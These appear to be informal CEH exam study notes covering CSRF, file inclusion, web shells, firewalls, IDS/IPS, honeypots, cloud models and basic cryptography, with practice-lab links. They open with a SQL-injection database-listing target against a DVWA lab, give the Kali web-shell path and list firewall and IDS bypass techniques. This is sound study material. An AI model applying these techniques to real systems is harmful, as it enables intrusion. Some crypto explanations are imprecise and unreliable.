http://192.168.1.9/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit# --dbs

CSRF / XSRF (Cross Site request Forgery)

Account no. , Card number , CVV OTP

An hacker can make a client authenticate request without the knowledge of the
target.

Remedy : 2 factor, ex:otp , Dont always rely on cookie based authentication, (Anti
CSRF token)

File Inclusion
Information Disclosure if inclusion path is given
Code Execution if we could add our own file to the inclusion
LFI (Local File Inclusion) Information Disclosure
RFI (Remote File Inclusion) Code Execution

File Upload
Gaining Webshells (Gaining access on Web server through web application)

Path of webshells in kali => /usr/share/webshells/php

/////
Firewall, IDS/IPS, Honeypot

A device which block access to malicious / unwanted

Application Filtering // senses the type of traffic and filters

accordingly (WAF)

Packet Filtering // filtering happend with respect to the content

 of the packets

Circuit Switching // Decision is made on the sessions of the user

Statefull Inspection // combination of two or more firewall

tool to detect firewall(WAF) is "wafw00f"

Bypass a firewall

1.Proxying
2.Encoding
Open Source firewall: Pfsense
/////////////
IDS (Intrusion Detection System) / IPS (Intrusion Prevention System)

IDS (informs when intruder is detected thereby allowing an attack to be happening)

IPS (performs an action allow/block the traffic when an intruder is identified)

NIDS/NIPS (Network IDS/IPS)

HIDS/HIPS (Host Based IDS/IPS)

Ex: Snort, KF Sensor, CISCO, Pfsense

Bypassing: Encoding

HoneyPots:

Its rat trap for hackers.

its dedicated, virtual machine, with vulnerable services running in it to attract

hackers and logs there activity.

Ex:KF Sensor
/////////////////////////

Cloud Computing
Why Cloud ..?
Infrastructure

IAAS Infrastructure As Service

Infra is given as service os installation, libraries, and other components
need to be taken care by client

PAAS Platform As Service

Platfrom (OS) and libraries will be given, configuration and data need to be
taken care by client

SAAS Software As Service

End user software will be given only data need to be taken care by client.
Ex: google sheets.

Amazon Web Services(CCSP), Azure, Google Cloud Platform, Alibaba

Cloud Based Vulnerability Scanner: Cloud Checker, Black Duck, Twist Lock

DARE: Data At Rest

Cryptography.
Encryption:-
Sender:
Plain text + Algorithm = Cipher text(encrypted)

Transfer

Decryption:-
Receiver:
Cipher text(encrypted) - Algorithm = Plain text

Symmetric key used is same for encryption and decryption

speed is more, security is less when communicating with new
person

Asymmetric key used is different for encryption and decryption

Public Key: key which is visible to any one, Ex: Phone Number
Private Key: key is visible only to the user, Ex: Password

note: data encrypted with public key, can only be decrypted by its private key, and
vice versa
speed is less, security is more

Hybrid combines both advantage of symmetric and asymmetric, and eliminates the
dis advantages b/w them.
SSH, https, VPN

Encoding, Encryption & Hashes

Encoding = which can be decoded publicly by any one who knows the algorithm, EX:
base64
Encryption = Which can be decrypted by only the person who has the key
EX;AES,DES, RSA etc
Hashing = is a one way algorithym which cannot be reversed EX: md5, sha1

///
hash: converts the plain text data into a unique text
md5,sha256,sha512
hello

1.for a unique file/text a unique string of text is generated no matter what ever
computer, location is to used to generate the hash.
2. Hashes are always irreversible.

hashcalc

/////
Notes:
Mock Exam:
https://www.skillset.com/certifications/ceh
http://www.gocertify.com/quizzes/ceh/ceh1.html

Practice:
http://overthewire.org/wargames/
https://www.vulnhub.com/
https://www.hackthebox.eu/
https://www.root-me.org/
https://lab.pentestit.ru/
https://attackdefense.com/

Exam Code:- 312-50

Blog: www.hackwithbkob.com

Images URL: https://drive.google.com/open?id=1iDLS9_EKqPQNmQiMVimyl-Gt320oNDXD

Mail: [email protected]